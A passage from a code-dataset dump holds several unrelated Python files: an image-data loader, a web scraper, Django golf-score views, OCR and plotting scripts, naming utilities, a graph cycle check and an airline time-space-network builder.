imgSize), interpolation=cv2.INTER_CUBIC)\n albedo = cv2.resize(albedo, (imgSize, imgSize), interpolation=cv2.INTER_CUBIC)\n shading = cv2.resize(shading, (imgSize, imgSize), interpolation=cv2.INTER_CUBIC)\n normal = cv2.resize(normal, (imgSize, imgSize), interpolation=cv2.INTER_CUBIC)\n mask = cv2.resize(mask, (imgSize, imgSize), interpolation=cv2.INTER_CUBIC)\n normalMask = cv2.resize(normalMask, (imgSize, imgSize), interpolation=cv2.INTER_CUBIC)\n\n # random crop\n H = image.shape[0]\n W = image.shape[1]\n maxH = H - self.size\n maxW = W - self.size\n sH = random.randint(0, maxH)\n sW = random.randint(0, maxW)\n \n image = image[sH:sH+self.size, sW:sW+self.size,:]\n albedo = albedo[sH:sH+self.size, sW:sW+self.size,:]\n shading = shading[sH:sH+self.size, sW:sW+self.size,:]\n normal = normal[sH:sH+self.size, sW:sW+self.size,:]\n mask = mask[sH:sH+self.size, sW:sW+self.size]\n normalMask = normalMask[sH:sH+self.size, sW:sW+self.size]\n mask = np.expand_dims(mask, -1)\n normalMask = np.expand_dims(normalMask, -1)\n \n #mask = mask*normalMask\n \n # convert to 0-1\n normal = normal.astype(np.float)\n 
normal = (normal/255.0 - 0.5)*2\n normal = normal/(np.tile(np.linalg.norm(normal, axis=-1, keepdims=True), (1,1,3)) + 1e-6)\n \n mask = 1.0*mask/255.0\n normalMask = 1.0*normalMask/255.0\n return image, albedo, shading, normal, mask, normalMask\n\n\nclass ToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n def __call__(self, sample):\n image, albedo, shading, normal, mask, normalMask = sample\n # swap color axis because\n # numpy image: H x W x C\n # torch image: C X H X W\n image = image.transpose((2, 0, 1))\n albedo = albedo.transpose((2, 0, 1))\n shading = shading.transpose((2, 0, 1))\n normal = normal.transpose((2, 0, 1))\n mask = mask.transpose((2, 0, 1))\n normalMask = normalMask.transpose((2, 0, 1))\n return torch.from_numpy(image), torch.from_numpy(albedo), \\\n torch.from_numpy(shading), torch.from_numpy(normal), \\\n torch.from_numpy(mask), torch.from_numpy(normalMask)\n","sub_path":"utils/loadData_CGI.py","file_name":"loadData_CGI.py","file_ext":"py","file_size_in_byte":8424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"37960126","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom scrapper.item_scrapper import ItemScrapper\n\n\nclass CeremonialItemScrapper(ItemScrapper):\n\n ###########\n # BUILDER #\n ###########\n\n def __init__(self, url, language):\n super().__init__(url, language)\n\n #########\n # SCRAP #\n #########\n\n def scrap(self):\n data = super().scrap()\n data['level'] = int(self.get_level())\n data['description'] = self.get_description()\n\n effects = self.get_effects()\n if(effects):\n data['effects'] = effects\n\n conditions = self.get_conditions()\n if(conditions):\n data['conditions'] = conditions\n\n characteristics = self.get_characteristics()\n if(characteristics):\n data['characteristics'] = characteristics\n\n craft = self.get_craft()\n if(craft):\n data['craft'] = craft\n\n return data\n","sub_path":"src/scrapper/ceremonial_item_scrapper.py","file_name":"ceremonial_item_scrapper.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"434810796","text":"# !/usr/bin/python\n# -*- coding: utf-8\n\nimport json\nimport datetime\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.urls import reverse\nfrom django.conf import settings\n\nfrom .models import Player, Playlog, Shotlog\nfrom .forms import PlayerForm, SelectForm, FileupForm\nfrom .jsonread import JsonDBInsert, updateexcheck\nfrom .logfilter import FilterPlaylog, RecentPlaylog\nfrom .joinlogs import join_playlogs, unbind_playlog\nfrom .infos import clubinfo\n\n\nHOLES = (\n\t\t\"hole1\", \"hole2\", \"hole3\", \n\t\t\"hole4\", \"hole5\", \"hole6\", \n\t\t\"hole7\", \"hole8\", \"hole9\", \n\t\t\"hole10\", \"hole11\", \"hole12\", \n\t\t\"hole13\", \"hole14\", \"hole15\", \n\t\t\"hole16\", \"hole17\", \"hole18\"\n\t\t)\n\n\n# Create your views here.\ndef index(request):\n\tif request.method == 'POST':\n\t\tform = PlayerForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tplayer = Player.objects.filter(name__iexact=form.cleaned_data['name'])\n\t\t\tif player.count() == 0:\n\t\t\t\tnewplayer = Player(name=form.cleaned_data['name'], yard=form.cleaned_data['yard'])\n\t\t\t\tnewplayer.save()\n\t\t\t\tplayerid = newplayer.id\n\t\t\telse :\n\t\t\t\tselectedplayer = player[0]\n\t\t\t\tplayerid = selectedplayer.id\n\t\t\t\tif selectedplayer.yard != 
form.cleaned_data['yard']:\n\t\t\t\t\tselectedplayer.yard = form.cleaned_data['yard']\n\t\t\t\t\tselectedplayer.save()\n\n\t\t\treturn HttpResponseRedirect(reverse('golf:playerindex', args=(playerid,)))\n\telse:\n\t\tform = PlayerForm()\n\n\treturn render(request, 'golf/index.html', {'form': form}) \n\n\ndef playerindex(request, playerid):\n\tprint('playerindex')\n\n\t# playerid check\n\ttry:\n\t\tplayer = Player.objects.get(id=playerid)\n\texcept:\n\t\treturn HttpResponseRedirect(reverse('golf:index'))\n\n\t# update the statistics-exclusion flags in the DB\n\tif request.is_ajax():\n\t\tprint('request is ajax')\n\t\tprint(request.body)\n\t\tnewjson = json.loads(request.body.decode('utf-8'))\n\t\tupdateexcheck(newjson['context'])\n\t\t\n\tselectform = SelectForm()\n\tfileupform = FileupForm()\n\n\t# recent playlogs; the number shown follows the player's setting\n\tcontext = RecentPlaylog(playerid, player.recent)\t\t\n\n\tcontext['selectform'] = selectform\n\tcontext['fileupform'] = fileupform\n\tcontext['player'] = player\n\n\treturn render(request, 'golf/playerindex.html', context) \n\n\ndef functions(request, **kwargs):\n\tplayerid = kwargs['playerid']\n\tprint('functions')\n\tprint(kwargs)\n\n\t# playerid check\n\ttry:\n\t\tplayer = Player.objects.get(id=playerid)\n\texcept:\n\t\treturn HttpResponseRedirect(reverse('golf:index'))\n\n\tif request.method == 'POST':\n\t\tif kwargs['fname'] == 'update':\n\t\t\tprint('update')\n\t\t\tfileupform = FileupForm(request.FILES)\n\t\t\toverwrite = request.POST.getlist('overwrite')\n\t\t\tif len(overwrite) != 0:\n\t\t\t\toverwrite = overwrite[0] == 'on'\n\t\t\tJsonDBInsert(request.FILES['jsonfile'], playerid, overwrite)\n\n\t\t\treturn HttpResponseRedirect(reverse('golf:playerindex', args=(playerid,)))\n\t\telif kwargs['fname'] == 'select':\n\t\t\tprint('select')\n\t\t\tif request.is_ajax():\n\t\t\t\tprint('select ajax')\n\t\t\t\tnewjson = json.loads(request.body.decode('utf-8'))\n\t\t\t\tupdateexcheck(newjson['context'])\n\n\t\t\t\tselectform = SelectForm(newjson)\n\t\t\t\tcontext = FilterPlaylog(\n\t\t\t\t\t\tplayerid, \n\t\t\t\t\t\tnewjson['startdate'], \n\t\t\t\t\t\tnewjson['enddate'], \n\t\t\t\t\t\tnewjson['course']\n\t\t\t\t\t\t)\n\t\t\t\tcontext['selectform'] = selectform\n\n\t\t\t\treturn render(request, 'golf/selectindex.html', context) \n\t\t\telse:\n\t\t\t\tselectform = SelectForm(request.POST)\n\n\t\t\t\tif selectform.is_valid():\n\t\t\t\t\tprint('select by submit')\n\t\t\t\t\tcontext = FilterPlaylog(\n\t\t\t\t\t\t\tplayerid, \n\t\t\t\t\t\t\tselectform['startdate'].value(), \n\t\t\t\t\t\t\tselectform['enddate'].value(), \n\t\t\t\t\t\t\tselectform['course'].value()\n\t\t\t\t\t\t\t)\n\t\t\t\t\tcontext['selectform'] = selectform\n\n\t\t\t\t\treturn render(request, 'golf/selectindex.html', context) \n\t\telif kwargs['fname'] == 'setting':\n\t\t\tprint('setting')\n\n\n\t\t\tcontext={\n\t\t\t\t'player': player,\n\t\t\t}\n\n\t\t\treturn render(request, 'golf/setting.html', context) \n\n\treturn HttpResponseRedirect(reverse('golf:playerindex', args=(playerid,)))\n\n\ndef logdetail(request, playerid, logid):\n\tprint('logdetail')\n\tif request.is_ajax():\n\t\tnewjson = json.loads(request.body.decode('utf-8'))\n\t\tif 'combine' in newjson:\n\t\t\t# combine\n\t\t\t# order (first/second) decided by timeinfo\n\t\t\tlogs = Playlog.objects.filter(id__in=[logid, int(newjson['combine'])]).order_by('timeinfo')\n\t\t\tnewplaylog = join_playlogs(logs[0], logs[1])\n\t\t\t\n\t\t\treturn JsonResponse({\"combinedlog\": newplaylog.id})\n\t\telif 'unbind' in newjson:\n\t\t\t# unbind\n\t\t\tcombinedlog = 
Playlog.objects.get(id=int(newjson['unbind']))\n\t\t\tfirstid = unbind_playlog(combinedlog)\n\n\t\t\treturn JsonResponse({\"first\": firstid})\n\n\t# playerid check\n\ttry:\n\t\tplayer=Player.objects.get(id=playerid)\n\texcept:\n\t\treturn HttpResponseRedirect(reverse('golf:index'))\n\n\t# get google apikey from file\n\tf = open(settings.GAPIKEY,'r')\n\tgapikey = f.readline()[:-1]\t# strip the trailing newline\n\n\t# playlog id check\n\ttry:\n\t\tlog = Playlog.objects.get(id=logid)\n\texcept:\n\t\treturn HttpResponseRedirect(reverse('golf:playerindex', args=(playerid,)))\n\n\t# if this log is a component of a combine, redirect to the combined log\n\tif log.hidden:\n\t\tcombinedlog = Playlog.objects.filter(combined=True, first=log)\n\t\tcombinedlog = combinedlog | Playlog.objects.filter(combined=True, second=log)\n\t\tif combinedlog.count() != 0:\n\t\t\treturn HttpResponseRedirect(reverse('golf:logdetail', args=(playerid,combinedlog[0].id)))\n\t\telse:\n\t\t\treturn HttpResponseRedirect(reverse('golf:playerindex', args=(playerid,)))\n\n\t# if num_holes == 9, show candidate playlogs that can be combined (timeinfo within 6 hours, course logs with the same timezone)\n\tcombinelist = []\n\tif log.num_holes == 9:\n\t\trule = 6\t# 6-hour window\n\t\tpostbound = log.timeinfo.datetime + datetime.timedelta(hours=rule)\n\t\tprebound = log.timeinfo.datetime - datetime.timedelta(hours=rule)\n\t\tcombinelist = Playlog.objects.filter(\n\t\t\t\tplayer=player, \n\t\t\t\tnum_holes=9, \n\t\t\t\ttimeinfo__datetime__lte=postbound, \n\t\t\t\ttimeinfo__datetime__gte=prebound, \n\t\t\t\ttimeinfo__timezoneid=log.timeinfo.timezoneid\n\t\t\t\t).exclude(id=log.id)\n\n\tpar = []\n\tlevel = []\n\tputt = []\n\tscoreset = []\n\tsand = []\n\tpenalty = []\n\tplayedhole = []\n\tgirs = []\n\tfhits = []\n\tpredic = {\n\t\t'par': 0,\n\t\t'score': 0,\n\t\t'putt': 0,\n\t\t'gir': 0,\n\t\t'fhit': 0,\n\t\t'totfhit': 9,\n\t\t'sand': 0,\n\t\t'penalty': 0,\n\t}\n\tpostdic = dict(predic)\n\ttotdic = dict(predic)\n\n\tfor idx, h in enumerate(HOLES[:log.num_holes], start=0):\n\t\tparval = getattr(log.course.par, h)\n\t\tpar.append(parval)\n\t\tlevel.append(getattr(log.course.level, h))\n\t\tscoreset.append(getattr(log.scoreset, h)-parval)\n\t\tputt.append(getattr(log.puttset, h))\n\t\tsand.append(getattr(log.sandshotset, h))\n\t\tpenalty.append(getattr(log.penaltyset, h))\n\t\tph = getattr(log, h)\n\t\tplayedhole.append(ph)\n\t\tgirs.append(ph.gir)\n\t\tfhits.append(ph.fhit)\n \n\t\tif idx < 9:\n\t\t\tpredic['par'] += par[idx]\n\t\t\tpredic['score'] += scoreset[idx]\n\t\t\tpredic['putt'] += putt[idx]\n\t\t\tpredic['sand'] += sand[idx]\n\t\t\tpredic['penalty'] += penalty[idx]\n\t\t\tpredic['gir'] += girs[idx]\n\t\t\tpredic['fhit'] += fhits[idx]\n\t\t\tif par[idx] == 3:\n\t\t\t\tpredic['totfhit'] -= 1\n\t\telse:\n\t\t\tpostdic['par'] += par[idx]\n\t\t\tpostdic['score'] += scoreset[idx]\n\t\t\tpostdic['putt'] += putt[idx]\n\t\t\tpostdic['sand'] += sand[idx]\n\t\t\tpostdic['penalty'] += penalty[idx]\n\t\t\tpostdic['gir'] += girs[idx]\n\t\t\tpostdic['fhit'] += fhits[idx]\n\t\t\tif par[idx] == 3:\n\t\t\t\tpostdic['totfhit'] -= 1\n\n\ttotdic['par'] = predic['par'] + postdic['par']\n\ttotdic['score'] = predic['score'] + postdic['score']\n\ttotdic['putt'] = predic['putt'] + postdic['putt']\n\ttotdic['sand'] = predic['sand'] + postdic['sand']\n\ttotdic['penalty'] = predic['penalty'] + postdic['penalty']\n\ttotdic['gir'] = (predic['gir'] + postdic['gir']) * 100/ 18.0 \n\ttotdic['fhit'] = (predic['fhit'] + postdic['fhit']) * 100.0 / (predic['totfhit'] + postdic['totfhit'])\n\n\tpredic['gir'] = predic['gir'] * 100.0 / 9\n\tpredic['fhit'] = 
predic['fhit'] * 100.0 / predic['totfhit']\n\tpostdic['gir'] = postdic['gir'] * 100.0 / 9\n\tpostdic['fhit'] = postdic['fhit'] * 100.0 / postdic['totfhit']\n\n\t# per-hole shot query for this playlog\n\tshots = []\n\tlog_timeinfo = log.timeinfo\n\tfor idx, holeidx in enumerate(HOLES[:log.num_holes], start=1):\n\t\tif log.combined and idx <= 9:\n\t\t\tlog_timeinfo = log.first.timeinfo\n\t\telif log.combined and idx > 9:\n\t\t\tlog_timeinfo = log.second.timeinfo\n\t\t\t\n\t\tshotlogs = Shotlog.objects.exclude(latitude=None).filter(\n\t\t\t\tplayer=log.player, \n\t\t\t\ttimeinfo=log_timeinfo, \n\t\t\t\tplayedhole=getattr(log, holeidx)\n\t\t\t\t)\n\t\tif shotlogs.count() != 0:\n\t\t\tshots.append(shotlogs)\n\t\telse:\n\t\t\tshots.append(None)\n\n\t# Club info\n\tlog_ids = []\n\tif log.combined:\n\t\tlog_ids.append(log.first.id)\n\t\tlog_ids.append(log.second.id)\n\telse:\n\t\tlog_ids.append(log.id)\n\t\t\n\tclubs = clubinfo(player.id, Playlog.objects.filter(id__in=log_ids), False)\n\n\thole = (1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18)\n\tstart = log.timeinfo.localstart()\n\tcontext= {\n\t\t'log': log,\n\t\t'start': start.strftime('%Y-%m-%d %H:%M:%S %z'),\n\t\t'holelist': hole[:log.num_holes],\n\t\t'par': par,\n\t\t'girs': girs,\n\t\t'fhits': fhits,\n\t\t'level': level,\n\t\t'putt': putt,\n\t\t'scoreset': scoreset,\n\t\t'sand': sand,\n\t\t'penalty': penalty,\n\t\t'holes': playedhole,\n\t\t'gapikey': gapikey,\n\t\t'shots': shots,\n\t\t'combinelist': combinelist,\n\t\t'clubs': clubs,\n        'predic': predic,\n        'postdic': postdic,\n        'totdic': totdic\n\t}\n\n\treturn render(request, 'golf/detail.html', context) \n","sub_path":"golf/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"568131734","text":"'''\nThe last index is 804,414.\n'''\nimport os\n\ndata_dir = 'coarse_chopped'\n\nif not os.path.exists(data_dir):\n    os.mkdir(data_dir)\n\nindex_cnt = 804414\nbatch_size = 402207\ninput_file = 'vectorized.dat'\n\nfout = None\n\nfor line in open(input_file):\n    row, col, value = line.rstrip('\\n').split('\\t')\n    if int(row) % batch_size == 1:\n        # close previously open file if any\n        if fout:\n            fout.close()\n\n        # create a new file (integer division so %d gets an int)\n        fnum = int(row) // batch_size\n        file_name = os.path.join(data_dir, 'chopped%d.dat' % fnum)\n        fout = open(file_name, 'w')\n\n    fout.write(line)\n\nfout.close()\n\n","sub_path":"code_doc10_f/chop_dat.py","file_name":"chop_dat.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"504732362","text":"from paddleocr import PaddleOCR\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--i', dest='input_dir', type=str, required=True)\nparser.add_argument('--o', dest='output_dir', type=str, required=True)\nargs = parser.parse_args()\nocr = PaddleOCR(\n    det_model_dir=\n    '/home/zhaohj/Documents/checkpoint/paddOCR/inference/ch_ppocr_server_v2.0/det',\n    rec_model_dir=\n    '/home/zhaohj/Documents/checkpoint/paddOCR/inference/ch_ppocr_server_v2.0/rec',\n    rec_char_dict_path=\n    '/home/zhaohj/Documents/checkpoint/paddOCR/inference/ch_ppocr_server_v2.0/ppocr_keys_v1.txt',\n    cls_model_dir=\n    '/home/zhaohj/Documents/checkpoint/paddOCR/inference/ch_ppocr_server_v2.0/cls',\n    use_angle_cls=True,\n    max_text_length=15,\n    drop_score=0.5,\n    det_db_unclip_ratio=2.0,\n    lang=\"ch\")\n\n\ndef predict(img):\n    ocr_data = ocr.ocr(img, cls=True)\n    return ocr_data\n\n\nif __name__ == 
'__main__':\n    import glob\n    import cv2\n    import os\n    import shutil\n\n    files = glob.glob(f'{args.input_dir}/*.png')\n    files.extend(glob.glob(f'{args.input_dir}/*.jpeg'))\n    files.extend(glob.glob(f'{args.input_dir}/*.jpg'))\n    files.extend(glob.glob(f'{args.input_dir}/*.webp'))\n    if os.path.exists(args.output_dir):\n        shutil.rmtree(args.output_dir)\n    for file in files:\n        _, filename = os.path.split(file)\n        filename, _ = os.path.splitext(filename)\n        output_filename = f'{args.output_dir}/{filename}.png.txt'\n        os.makedirs(os.path.dirname(output_filename), exist_ok=True)\n        img = cv2.imread(file)\n        ocr_data = predict(img)\n        with open(output_filename, 'a') as f:\n            for data in ocr_data:\n                box = data[0]\n                txt = data[1][0]\n                confidence = data[1][1]\n                line = f\"{', '.join([', '.join(str(int(m)) for m in x) for x in box])},{confidence},{txt}\\n\".replace(\n                    ' ', '')\n                f.write(line)\n        del ocr_data\n","sub_path":"ocr_evaluation/transfer_paddle.py","file_name":"transfer_paddle.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"280010636","text":"# coding: utf-8\n\nimport hashlib\nimport os.path\n\nfrom mss.tools import to_png\n\n\nWIDTH = 10\nHEIGHT = 10\nMD5SUM = '055e615b74167c9bdfea16a00539450c'\n\n\ndef test_output_file():\n    data = b'rgb' * WIDTH * HEIGHT\n    output = '{}x{}.png'.format(WIDTH, HEIGHT)\n    to_png(data, (WIDTH, HEIGHT), output=output)\n\n    assert os.path.isfile(output)\n    with open(output, 'rb') as png:\n        assert hashlib.md5(png.read()).hexdigest() == MD5SUM\n\n\ndef test_output_raw_bytes():\n    data = b'rgb' * WIDTH * HEIGHT\n    raw = to_png(data, (WIDTH, HEIGHT))\n    assert hashlib.md5(raw).hexdigest() == MD5SUM\n","sub_path":"tests/test_tools.py","file_name":"test_tools.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"181352182","text":"\n# Copyright (c) 2016, Genevolv LLC. All rights reserved.\n\n''' Common string translations used in naming strategies.'''\n\nimport logging\nLOG = logging.getLogger(__name__)\n# LOG.setLevel(logging.INFO)\n\nimport re\n\ndef SQL_to_CapitalizedWords(name):\n    ''' Converts name to class-version capitalized words. '''\n    # LOG.debug(name)\n    low = name.lower()\n    expanded = list(low)\n    expanded[0] = expanded[0].upper()\n    idx = low.find('_')\n    while idx != -1:\n        idx += 1\n        expanded[idx] = expanded[idx].upper()\n        idx = low.find('_', idx)\n    retval = \"\".join(expanded)\n    retval = retval.replace('_', '')\n    return retval\n\ndef SQL_to_mixedCase(name):\n    ''' Converts name to camel case. 
'''\n    retval = SQL_to_CapitalizedWords(name)\n    retval = retval[0].lower() + retval[1:]\n    return retval\n\ndef trunc_from_last_underscore(name):\n    ''' Returns a string equal to everything before the last underscore\n        in name.\n    '''\n    idx = name.rfind('_')\n    retval = name[:idx]\n    return retval\n\ndef CapitalizedWords_to_mixedCase(name):\n    ''' Converts name to class-style camel case.'''\n    match = re.search('[a-z]', name)\n    if match is None:\n        retval = name.lower()\n    else:\n        start = match.start()\n        if start > 1:\n            retval = name[:start-1].lower() + name[start-1:]\n        else:\n            retval = name[0].lower() + name[1:]\n    return retval\n\ndef CapitalizedWords_to_py_name(name):\n    ''' Converts capitalized words to python variable name.'''\n    rtn = CapitalizedWords_to_mixedCase(name)\n    rtn = re.sub('([A-Z]+)', r'_\\1', rtn).lower()\n    # LOG.debug('rtn: ' + str(rtn))\n    return rtn\n\ndef trunc_from_last_hump(name):\n    ''' Returns a string equal to everything before the last capital\n        letter.\n    '''\n    # LOG.debug('name: ' + str(name))\n    mlist = re.findall('[A-Z]+', name)\n    # LOG.debug('mlist: ' + str(mlist))\n    if len(mlist) > 0:\n        group = mlist[-1:]\n        sub = group[0]\n        # LOG.debug('sub: ' + str(sub))\n        idx = name.rfind(sub)\n        retval = name[:idx]\n    else:\n        raise TypeError('no humps: ' + str(name))\n    # LOG.debug('retval: ' + str(retval))\n    return retval\n\ndef depluralize(name):\n    ''' Makes a name singular.'''\n    retval = name\n    if retval[-3:] == 'ies':\n        retval = retval[:-3] + 'y'\n    elif retval[-1:] == 's':\n        retval = retval[:-1]\n    return retval\n\n","sub_path":"py/freevolv/apps/dbrev/naming/name_translations.py","file_name":"name_translations.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"148858093","text":"# Plot the content of a csv file\nimport scipy\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.rcParams.update({'font.size': 22})\nfrom matplotlib import rcParams\nfrom matplotlib.ticker import MaxNLocator\nimport csv\nimport seaborn as sns\nimport pandas as pd\n\nrcParams.update({'figure.autolayout': True})\nrcParams['font.family'] = 'serif'\nrcParams['font.serif'] = ['Computer Modern Roman']\nrcParams['text.usetex'] = True\n\ndef plotdiameter():\n    # Initialize empty arrays\n\n    t1 = []\n    x1 = []\n    t2 = []\n    x2 = []\n\n\n\n    with open('python/interface_pos.csv','r') as csvfile:\n        data = csv.reader(csvfile, delimiter=',')\n        next(data)\n        for row in data:\n            t1.append(float(row[0]))\n            x1.append(float(row[1]))\n\n    with open('bubbleInfo.csv','r') as csvfile:\n        data = csv.reader(csvfile, delimiter=',')\n        for row in data:\n            t2.append(float(row[0]))\n            x2.append(float(row[1])/4e-11)\n\n    # Plot\n    plt.figure(figsize=(250 /25.4, 200 / 25.4))\n    plt.plot(t1,x1, 'b--', label='Analytical solution',linewidth=3)\n    plt.plot(t2,x2, 'r-', label='Simulation',linewidth=3)\n    plt.xlabel('Time [s]')\n    plt.ylabel('Position [m]')\n    plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n    plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n    #plt.title('Interesting Graph\\nCheck it out')\n    plt.legend(frameon=True,loc='upper left')\n    #plt.show()\n    plt.draw()\n    # Save in pdf format\n    plt.savefig('benchmark.pdf')\n\n\nplotdiameter()\nplt.show()\n","sub_path":"stefanobstacle/python/plotBenchmark.py","file_name":"plotBenchmark.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"214892776","text":"\"\"\"\n\"\"\"\nfrom 
collections import defaultdict\n\n\nclass Graph:\n \n \n def __init__(self, vertices):\n self.V = vertices\n self.graph = defaultdict(list)\n \n def addEdge(self, u, v):\n self.graph[u].append(v)\n #self.graph[v].append(u)\n \n \n \n \n def find_parent(self, parent, x):\n if parent[x] == -1:\n return x\n return self.find_parent(parent, parent[x])\n \n def union(self, parent, x, y):\n \n x_set = self.find_parent(parent, x)\n y_set = self.find_parent(parent, y)\n parent[x_set] = y_set\n \n def isCyclic(self):\n \n parent = [-1]*self.V\n \n \n for u in self.graph:\n for v in self.graph[u]:\n x = self.find_parent(parent, v)\n y = self.find_parent(parent, u)\n if x != y:\n self.union(parent, v, u)\n else:\n print(parent)\n return True\n print(parent) \n return False\n \n \n def dfsUtil(self, visited, u):\n if visited[u] is True:\n return True\n \n else:\n visited[u] = True\n for v in self.graph[u]:\n if self.dfsUtil(visited, v):\n return True\n \n visited[u] = False\n\n return False\n \n def dfs(self):\n \n visited = [False]*self.V\n \n return self.dfsUtil(visited, 0)\n \n \n \n\n \nif __name__ == \"__main__\":\n g = Graph(8)\n g.addEdge(0, 1)\n g.addEdge(1, 7)\n g.addEdge(1, 2)\n g.addEdge(2, 3)\n g.addEdge(2, 5)\n g.addEdge(5, 6)\n g.addEdge(3, 4)\n #g.addEdge(4, 1)\n \n \n print(g.isCyclic())\n print(g.dfs())\n \n \n \n ","sub_path":"Chapter 9 Graphs/DetectCycle.py","file_name":"DetectCycle.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"288495292","text":"import copy\nimport logging\nimport numpy as np\nfrom networkx import DiGraph, has_path, astar_path, NetworkXNoPath\n# Local imports\nfrom examples.cgar.classes import Expand, Flight\nfrom examples.cgar.constants import OPERATING_COSTS\n\nlog = logging.getLogger(__name__)\n\n\nclass TSN(object):\n \"\"\"\n Time-Space-Network Object with generator and updater functions.\n\n Parameters\n ----------\n flights : list,\n list of :class:`classes.Flight` objects\n \"\"\"\n\n def __init__(self, flights):\n self.flights = flights\n self.last_arr = max([f.arrival for f in flights]) # last arrival\n self.data = Expand()\n self.G = DiGraph(directed=True, n_res=8)\n # Init update params\n self.it = None\n self.k_make = None\n self.airline = None\n self.duals = None\n self.first_flight = None\n\n def _build(self):\n self._build_data()\n self._build_graph()\n return self\n\n def _build_data(self):\n airports_dep = [f.origin for f in self.flights]\n airports_arrival = [f.destination for f in self.flights]\n self.data.airports = list(set(airports_arrival + airports_dep))\n self.data.airports.sort()\n\n def _build_graph(self):\n # Construct an Activity-on-Arc network using flights as activities\n flights = self.flights\n airports = self.data.airports\n\n self.G.add_node('Source',\n pos=(-1, len(airports) + 1),\n i_d=-1,\n airport='Source')\n self.G.add_node('Sink',\n pos=(self.last_arr + 1, -2),\n i_d=-1,\n airport='Sink')\n list(map(self._init_graph, flights))\n self._add_edges()\n log.info(\"Generated TSN with {} edges {} nodes\".format(\n len(self.G.edges()), len(self.G.nodes())))\n # plot_graph(self.G)\n\n def _init_graph(self, f):\n \"\"\" Populate graph using flights from csv file\"\"\"\n label_dep = \"{}_{}\".format(f.origin, f.departure) # label\n # Arrival node label\n label_arr = \"{}_{}\".format(f.destination, f.arrival) # label\n self._init_node(f, label_dep, label_arr) # Init nodes\n self._init_edge(f, label_dep, label_arr) # Init edges\n\n def 
_init_node(self, f, label_dep, label_arr):\n # Add a Departure Node\n self.G.add_node(label_dep,\n pos=(f.departure, self.data.airports.index(f.origin)),\n airport=f.origin)\n # Add an Arrival Node\n self.G.add_node(label_arr,\n pos=(f.arrival,\n self.data.airports.index(f.destination)),\n airport=f.destination)\n\n def _init_edge(self, f, label_dep, label_arr):\n # Add all flight edges\n self.G.add_edge(label_dep, label_arr, data=f._full_dict(), weight=0)\n # Add edge from Source to departure and arrival nodes\n data_source = {\n 'origin': 'Source',\n 'destination': f.origin,\n 'departure': -1,\n 'arrival': f.departure,\n 'type': f._classify_flight(0, f.departure)\n }\n self.G.add_edge('Source',\n label_dep,\n data=data_source,\n weight=self._edge_weight('Source', label_dep))\n # Add edge from arrival to Sink\n data_sink = {\n 'origin': f.destination,\n 'destination': 'Sink',\n 'departure': f.arrival,\n 'arrival': self.last_arr,\n 'type': f._classify_flight(f.arrival, self.last_arr)\n }\n self.G.add_edge(label_arr,\n 'Sink',\n data=data_sink,\n weight=self._edge_weight(label_arr, 'Sink'))\n\n def _add_edges(self):\n # Add edges if not already exist with their respective data\n self._add_ground_edges()\n self._add_remaining_edges()\n\n def _add_ground_edges(self):\n nodes = sorted(\n [\n node\n for node in self.G.nodes(data=True)\n if node[0] not in [\"Source\", \"Sink\"]\n ],\n key=lambda x: x[1]['pos'][0],\n )\n\n for n in nodes:\n # first element in tuple has string 'Airport_time'\n # Second element in tuple has node data\n n_name, n_data = n[0], n[1]\n n_time = float(n_name.split('_')[1])\n ground_nodes_n = sorted(\n [\n k\n for k in nodes\n if float(k[0].split('_')[1]) > n_time\n and n_data['airport'] == k[1]['airport']\n ],\n key=lambda x: x[1]['pos'][0],\n )\n\n # ground_nodes_n.sort()\n if ground_nodes_n:\n m = ground_nodes_n[0]\n # for m in ground_nodes_n:\n path = None\n m_name, m_data = m[0], m[1]\n m_time = float(m_name.split('_')[1])\n if not self.G.has_edge(*(n_name, m_name)):\n try:\n path = astar_path(self.G, n_name, m_name)\n except NetworkXNoPath:\n self._add_edge(n_name, n_data, n_time, m_name, m_data,\n m_time)\n if path and any(\n p.split('_')[0] != n_data['airport'] for p in path\n ):\n # if edge doesn't exist, add it\n self._add_edge(n_name, n_data, n_time, m_name, m_data,\n m_time)\n\n def _add_remaining_edges(self):\n nodes = sorted(\n [\n node\n for node in self.G.nodes(data=True)\n if node[0] not in [\"Source\", \"Sink\"]\n ],\n key=lambda x: x[1]['pos'][0],\n )\n\n for n in nodes:\n # first element in tuple has string 'Airport_time'\n # Second element in tuple has node data\n n_name, n_data = n[0], n[1]\n n_time = float(n_name.split('_')[1])\n nodes_n = sorted(\n [k for k in nodes if float(k[0].split('_')[1]) > n_time],\n key=lambda x: x[1]['pos'][0],\n )\n\n # nodes_n.sort()\n for m in nodes_n:\n m_name, m_data = m[0], m[1]\n m_time = float(m_name.split('_')[1])\n if (not has_path(self.G, n_name, m_name)):\n # if path doesn't exist add edge\n f = [f for f in self.flights\n if (f.origin == n_name and f.destination == m_name and\n f.arrival - 